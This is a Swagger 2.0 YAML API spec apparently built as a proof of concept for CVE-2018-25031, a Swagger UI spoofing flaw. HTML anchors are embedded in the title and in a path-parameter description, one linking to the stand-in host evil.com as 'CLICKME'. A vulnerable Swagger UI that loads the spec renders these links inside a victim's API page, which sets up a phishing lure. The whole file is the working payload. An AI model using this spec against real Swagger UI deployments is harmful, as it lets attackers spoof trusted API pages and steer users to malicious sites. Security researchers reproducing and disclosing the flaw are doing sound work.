swagger: '2.0'
info:
  title: Exploited by <a href="//hackerone.com/almuntadhar">Al-Muntadhar</a>
  description: |
    CVE-2018-25031
  version: production

basePath: /fakeapi/almuntadhar
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []

paths:
  /almuntadhar:
    get:
      tags:
        - EZ
      summary: this is example text
      operationId: findAccounts
      responses:
        '200':
          description: You are interacting with the victims api

  /almuntadhar_delete/{id}:
    delete:
      tags:
        - Swagger UI exploit
      summary: swagger
      operationId: swagger
      parameters:
        - name: id
          in: path
          required: true
          type: integer
          format: int64
          description: |
            <a href="//evil.com">CLICKME</a>
      responses:
        '200':
          description: CVE-2018-25031

    get:
      tags:
        - Swagger UI exploit
      summary: this is example text
      operationId: some_operation
      parameters:
        - name: id
          in: path
          required: true
          type: integer
          format: int64
          description: Test
      responses:
        '200':
          description: Test

securityDefinitions:
  basicAuth:
    type: basic
